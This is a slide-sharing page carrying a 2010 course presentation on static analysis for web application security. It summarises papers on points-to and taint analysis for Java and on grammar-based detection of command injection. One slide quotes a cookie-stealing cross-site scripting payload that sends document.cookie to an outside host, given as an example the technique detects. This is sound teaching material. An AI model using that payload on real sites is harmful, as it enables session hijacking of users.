program analysis for web application security
play

Program Analysis for Web Application Security Presented by Justin - PowerPoint PPT Presentation

Mar 11, 2024 •400 likes •743 views

Program Analysis for Web Application Security Presented by Justin Samuel For UW CSE 504, Spring 10 Instructor: Ben Livshits Finding Security Vulnerabilities in Java Applications with Static Analysis V. Benjamin Livshits and Monica S. Lam

  1. Program Analysis for Web Application Security Presented by Justin Samuel For UW CSE 504, Spring ‘10 Instructor: Ben Livshits

  2. Finding Security Vulnerabilities in Java Applications with Static Analysis V. Benjamin Livshits and Monica S. Lam Usenix Security ‘05

  3. Unchecked User Input Input Sources Vulnerabilities Parameter manipulation SQL Injection URL manipulation HTTP response splitting Header manipulation Cross-site scripting Cookie poisoning Path traversal Command injection When input is not properly sanitized before use, a variety of vulnerabilities are possible. 2010-05-03 Static Analysis and Web App Security 3

  4. Detecting Unchecked Input Statically • Goal: use static analysis to identify missing input sanitization. – We’ll call use of unchecked input “security violations.” • Can we use existing points-to analysis? – Sound, precise, and scalable? • Is points-to analysis all we need? 2010-05-03 Static Analysis and Web App Security 4

  5. Background: Points-to Analysis • Determine which heap objects a given program variable may point to during execution. • Desirable qualities: – Soundness • No false negatives: every possible points-to relationship is identified. • Being conservative leads to imprecision. – Precision • Few false positives. – Efficiency • Speed of analysis can be a problem. 2010-05-03 Static Analysis and Web App Security 5

  6. Points-to Precision Problem 1 class DataSource { 2 String url; 3 DataSource(String url ) { 4 this.url = url; 5 } 6 String getUrl(){ 7 return this.url; 8 } 9 ... 10 } 11 String passedUrl = request.getParameter("..."); 12 DataSource ds1 = new DataSource( passedUrl ); 13 String localUrl = "http://localhost/"; 14 DataSource ds2 = new DataSource( localUrl ); 15 16 String s1 = ds1 .getUrl(); 17 String s2 = ds2 .getUrl(); • An imprecise points-to analysis would not differentiate between possible objects referred to by s1 and s2. 2010-05-03 Static Analysis and Web App Security 6

  7. Imprecision From Context-Insensitivity a b Object id( Object p ) { return p; } p x = id( a ); y = id( b ); x y pointsto( v : Var, h : Heap ) 2010-05-03 Static Analysis and Web App Security 7

  8. Context-Sensitive a b Object id( Object p ) { return p; } p 1 p 2 x = id( a ); y = id( b ); x y pointsto( vc : VarContext, v : Var, h : Heap ) 2010-05-03 Static Analysis and Web App Security 8

  9. Context-sensitivity and Cloning • The context of a method invocation is distinguished by its call path (call stack). • k -CFA (Control Flow Analysis): remember only the last k call sites. • Use cloning. [Whaley, PLDI 04] – Generate multiple instances of a method so that each call is invoking a different instance. – ∞ -CFA when there is no recursion. – Does cloning sound familiar? KLEE? 2010-05-03 Static Analysis and Web App Security 9

  10. Scalability of Context-Sensitivity • Exponentially many points-to results. • Use Binary Decision Diagrams (BDDs) for solving points- to analysis [Berndl, PLDI ‘03] Image: http://en.wikipedia.org/wiki/Bi nary_decision_diagram • Use BDD-Based Deductive DataBase (bddbddb) [Whaley & Lam, PLDI ‘04] – Express pointer analysis in Datalog (logic programming language). – Translate Datalog into efficient BDD implementations. 2010-05-03 Static Analysis and Web App Security 10

  11. Imprecision From Object-Insensitivity a b x = new Foo(); y = new Foo(); a = new Bar(); b = new Bar(); v x.v = a; y.v = b; x, y Note: this is actually showing field sensitivity, not object sensitivity. pointsto( v : Var, h : Heap ) 2010-05-03 Static Analysis and Web App Security 11

  12. Object-Sensitivity a b x = new Foo(); y = new Foo(); a = new Bar(); b = new Bar(); v v x.v = a; y.v = b; x y Note: this is actually showing field sensitivity, not object sensitivity. pointsto( vo : Heap, v : Var, h : Heap ) 2010-05-03 Static Analysis and Web App Security 12

  13. Imprecision From Maps/Collections x t y HashMap map = new HashMap(); String x = req.getParam(“x”); map.put(“NAME”, x); data String t = “boss”; map.put(“TITLE”, t); map String y = map.get(“TITLE”); • Maps with constant strings are common. 2010-05-03 Static Analysis and Web App Security 13

  14. Map-sensitivity x t y HashMap map = new HashMap(); String x = req.getParam(“x”); map.put(“NAME”, x); “NAME” “TITLE” String t = “boss”; map.put(“TITLE”, t); map String y = map.get(“TITLE”); • Model HashMap.put/get operations specially. 2010-05-03 Static Analysis and Web App Security 14

  15. Flow-Sensitivity • Flow-sensitive analysis computes a different solution for each point in the program. • Common difficulties: – Strong updates difficult, thus weak updates used. • Is this a problem for functional languages? – Efficiency. • Approach: use only local flow (within methods). 2010-05-03 Static Analysis and Web App Security 15

  16. Putting It Together • Object-sensitivity + Context-sensitivity gives the following relation: pointsto( vc : VarContext, vo : Heap, v : Var, h : Heap ) • Plus map-sensitivity and special handling of Java string routines. • “1-level object-sensitivity” (?) [Livshits slides]: pointsto( vc : VarContext, vo 1 : Heap, vo 2 : Heap, v : Var, ho : Heap, h : Heap ) 2010-05-03 Static Analysis and Web App Security 16

  17. Points-to Analysis and We’re Done? 1 String param = req.getParameter("user"); 2 ... 3 String query = param; 4 ... 5 con.executeQuery(query); • Points-to analysis gives us static knowledge of what an object refers to at runtime. • To find missing input checks, we still need to identify objects sources and sinks. 2010-05-03 Static Analysis and Web App Security 17

  18. Use PQL for Taint Analysis • Same PQL that we saw a few weeks ago. • Specify sources, derivations, and sinks. 2010-05-03 Static Analysis and Web App Security 18

  19. Integration with Eclipse • TODO 2010-05-03 Static Analysis and Web App Security 19

  20. Vulnerabilities Discovered • Discovered 23 vulnerabilities in real applications. – Only 1 was already known. – 1 found in library (hibernate), another in J2EE implementation. • 4 of the 23 are the same J2EE implementation error. – “Almost all errors we reported to program maintainers were confirmed.” – Also found 6 vulnerabilities in webgoat. • 12 false positives. – All in one app (snipsnap) due to insufficient precision of object-naming. SQL injections HTTP splitting XSS Path traversal Total Header manip 0 6 3 0 9 Param. manip. 2 5 0 2 9 Cookie poison 0 0 0 0 0 Non-Web input 2 0 0 3 5 Total 4 11 3 5 23 2010-05-03 Static Analysis and Web App Security 20

  21. Evaluation Summary Summary of data on the number of tainted objects, reported security violations, and false positives for each analysis version. Enabled analysis features are indicated by checkmarks. 2010-05-03 Static Analysis and Web App Security 21

  22. Number of Tainted Objects Comparison of the number of tainted objects for each version of the analysis. 2010-05-03 Static Analysis and Web App Security 22

  23. Timing Evaluation 2010-05-03 Static Analysis and Web App Security 23

  24. Limitations • Dynamic class loading and generation. • Reflectively called classes. – For reflective calls, a simple analysis is used that handles common uses of reflection. 2010-05-03 Static Analysis and Web App Security 24

  25. Essence of Command Injection Attacks Zhendong Su and Gary Wassermann POPL ‘06

  26. Taint Analysis is Not Sufficient • Sanitization of user input can be inaccurate. • Checked input is not always safe. – Inaccurate checking may allow it to alter the structure of commands constructed from the string. 2010-05-03 Static Analysis and Web App Security 26

  27. SQL Injection Parse Tree Example 2010-05-03 Static Analysis and Web App Security 27

  28. Modify Input, Use a New Grammar • Define an augmented grammar with additional production rules using new delimiters: • Add the delimiters around all user input. • Make sure commands parse correctly with the new grammar before stripping delimiters and running the real command. 2010-05-03 Static Analysis and Web App Security 28

  29. Applicable Beyond SQL Injection • The idea is “general and appl[ies] to other settings that generate structured, meaningful output from user- provided input.” – Cross-Site Scripting (XSS) – XPath injection – Shell injection 2010-05-03 Static Analysis and Web App Security 29

  30. Cross Site Scripting • The following attack input could be detected: ><script>document.location='http://www.xss.com/cgi- bin/cookie.cgi?'%20+document.cookie</script – It is “…not a valid syntactic form, since the first character completes a preceding tag.” • What grammar does one augment? – XSS can be within HTML or JavaScript. – Can this input be XSS and what syntax would it violate? javascript:document.location=... 2010-05-03 Static Analysis and Web App Security 30

  31. Evaluation 2010-05-03 Static Analysis and Web App Security 31

Recommend

Application Security as a Service: Start Your Application Security Initiative in Less than a Day

Application Security as a Service: Start Your Application Security Initiative in Less than a Day

Application Security as a Service: Start Your Application Security Initiative in Less than a Day David Harper Practice Principal Fortify on Demand #MicroFocusCyberSummit Agenda The Application Security Problem Security Gate Secure DevOps

37.39k views • 30 slides
Program Analysis in Software Development Summary of Papers Program Analysis Application Areas

Program Analysis in Software Development Summary of Papers Program Analysis Application Areas

Program Analysis in Software Development Summary of Papers Program Analysis Application Areas Compilation and Optimization LLVM: A Compilation Framework for Lifelong Program Analysis &amp; Transformation Obfuscation Generation and

1.64k views • 6 slides
Program Analysis with PREfast &amp; SAL Erik Poll Digital Security group Radboud University

Program Analysis with PREfast &amp; SAL Erik Poll Digital Security group Radboud University

Software Security Program Analysis with PREfast &amp; SAL Erik Poll Digital Security group Radboud University Nijmegen 1 Static analysis aka source code analysis Automated analysis at compile time to find potential bugs Broad range of

499 views • 36 slides
Analysis of Web Application Security Yih Kuen Tsay () Dept. of Information Management

Analysis of Web Application Security Yih Kuen Tsay () Dept. of Information Management

Analysis of Web Application Security Yih Kuen Tsay () Dept. of Information Management National Taiwan University Joint work with ChenI Chung, ChihPin Tai, ChenMing Yao, RuiYuan Yeh, and ShengFeng Yu 2012/11/28 @ JST

827 views • 57 slides
Heroes vs Villains: Building an Application Security Program that Scales Kevin Delaney , B.IT

Heroes vs Villains: Building an Application Security Program that Scales Kevin Delaney , B.IT

Heroes vs Villains: Building an Application Security Program that Scales Kevin Delaney , B.IT Hons. NetSec Director of Solutions Architecture Security Compass Over 160 Million Credit Cards lifted over 7 years Villains are PROACTIVE Heroes are

452 views • 22 slides
Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security Information Systems Course Business Course site: http://67327.cmuis.net Schedule Reading Assignments in-class labs -- laptops w/ 272

981 views • 10 slides
Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security

Introduction to Web Application Security Professor Larry Heimann Web Application Security Information Systems Course Business Course site: https://67327.cmuis.net Schedule Reading Assignments in-class labs -- laptops w/ 272

1.31k views • 11 slides
2019 Application Development Workshop State Homeland Security Program (SHSP) Office of the

2019 Application Development Workshop State Homeland Security Program (SHSP) Office of the

2019 Application Development Workshop State Homeland Security Program (SHSP) Office of the Governor Homeland Security Grants Division Preparedness Programs Housekeeping Items Restrooms Breaks Schedule Food &amp; Beverage

938 views • 64 slides
Using Z-Ray for Lightning Fast Security Analysis Martin Bednorz ZendCon Las Vegas 2018 1

Using Z-Ray for Lightning Fast Security Analysis Martin Bednorz ZendCon Las Vegas 2018 1

Using Z-Ray for Lightning Fast Security Analysis Martin Bednorz ZendCon Las Vegas 2018 1 Introduction 10+ years of web development experience IT security background Web application security Incremental static code analysis

881 views • 73 slides
Web Application Security Attacks on the Web Attacker Web User Application Web Database Web

Web Application Security Attacks on the Web Attacker Web User Application Web Database Web

IN3210 Network Security Web Application Security Attacks on the Web Attacker Web User Application Web Database Web Server Application 2 The OWASP Foundation The Open Web Application Security Project (OWASP) is a 501(c)(3)

1.21k views • 60 slides
Application Training by David Noguera 1 Overview 1. Dissecting the Application 2. Program

Application Training by David Noguera 1 Overview 1. Dissecting the Application 2. Program

Urban Land Bank Demonstration Program Application Training by David Noguera 1 Overview 1. Dissecting the Application 2. Program Description 3. Program Uses 4. Lot Sales Price 5. Eligible Program Applicants 6. Program Requirements

432 views • 12 slides
OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of

OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of

OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of Session: - Provide Overview Web Application Security Threats and Defense Using the Open Web Application Security Project (OWASP) Top List, we

830 views • 39 slides
Network Security Where we are in the Course Security crosses all layers Application

Network Security Where we are in the Course Security crosses all layers Application

Network Security Where we are in the Course Security crosses all layers Application Transport Network Link Physical CSE 461 University of Washington 2 Security Threats Security is like performance Means many things

932 views • 55 slides
Network Security Where we are in the Course Security crosses all layers Application

Network Security Where we are in the Course Security crosses all layers Application

Network Security Where we are in the Course Security crosses all layers Application Transport Network Link Physical CSE 461 University of Washington 2 Security Threats Security is like performance Means many things

374 views • 13 slides
Web Application Forensics HTTPD Logfile Security Analysis Jens Mller, Ruhr University Bochum

Web Application Forensics HTTPD Logfile Security Analysis Jens Mller, Ruhr University Bochum

Web Application Forensics HTTPD Logfile Security Analysis Jens Mller, Ruhr University Bochum jens.a.mueller@rub.de Scenario You got pwned The Log File Problem Log files are huge. We are lazy. How find important stuff? Still

873 views • 28 slides
Application Security Management (ASM) August 9, 2016 CC Kermen Agenda About Application

Application Security Management (ASM) August 9, 2016 CC Kermen Agenda About Application

Application Security Management (ASM) August 9, 2016 CC Kermen Agenda About Application Security Management (ASM) Features and Benefits Performance Review Ordering Information About Application Security Management (ASM)

618 views • 7 slides
Program analysis for security Two main classes Static: Operates on source or binary at

Program analysis for security Two main classes Static: Operates on source or binary at

Program analysis for security Two main classes Static: Operates on source or binary at rest Dynamic: Operates at runtime Also hybrids of the two Static: Examples Code review Grep Taint analysis Symbolic

726 views • 49 slides
Application security Application security September 25, 2020 Administrative submittal

Application security Application security September 25, 2020 Administrative submittal

Application security Application security September 25, 2020 Administrative submittal instructions submittal instructions Administrative answer the lab assignments questions in written report form, as a text, pdf, or Word

566 views • 37 slides
Vulnerability Analysis Part 2 RK Shyamasundar IIT Bombay Outline Software Security

Vulnerability Analysis Part 2 RK Shyamasundar IIT Bombay Outline Software Security

Vulnerability Analysis Part 2 RK Shyamasundar IIT Bombay Outline Software Security Web Application Security Buffer Overflow Web content security: SSL Buffer Overflow Phishing attacks mitigation techniques

1.51k views • 84 slides
Software In-Security Buffer overflows Overview Web Application security Malware OS

Software In-Security Buffer overflows Overview Web Application security Malware OS

Lecture overview Table of contents: Introduction to SW security Software In-Security Buffer overflows Overview Web Application security Malware OS security topics Code scanning Emmanuel Benoist Taught by Ulrich

479 views • 13 slides
Program Analysis Toolkit Allen D. Malony and Janice E. Cuny

Program Analysis Toolkit Allen D. Malony and Janice E. Cuny

Program Analysis Toolkit Allen D. Malony and Janice E. Cuny http://www.cs.uoregon.edu/research/paracomp/proj/ Application Source Code Program EDG C++ C F90 Database Front Ends Toolkit Intermediate Language Analyzer (PDT) DUCTAPE

88 views • 7 slides
Web Application Security Payloads Andrs Riancho Director of Web Security BlackHat 2011 -

Web Application Security Payloads Andrs Riancho Director of Web Security BlackHat 2011 -

Web Application Security Payloads Andrs Riancho Director of Web Security BlackHat 2011 - Barcelona Topics Short w3af introduction Whats new in w3af Automating Web application exploitation The problem and how other tools are

553 views • 54 slides
Web Security [Web Application Security] Spring 2020 Franziska (Franzi) Roesner

Web Security [Web Application Security] Spring 2020 Franziska (Franzi) Roesner

CSE 484 / CSE M 584: Computer Security and Privacy Web Security [Web Application Security] Spring 2020 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, Ada Lerner, John

540 views • 29 slides
Attacking Authentication Professor Larry Heimann Web Application Security Information Systems

Attacking Authentication Professor Larry Heimann Web Application Security Information Systems

Attacking Authentication Professor Larry Heimann Web Application Security Information Systems Challenge from last class Importance of checking every step of the process Simple ways to defend against this attack Data from an analysis of

368 views • 19 slides

More recommend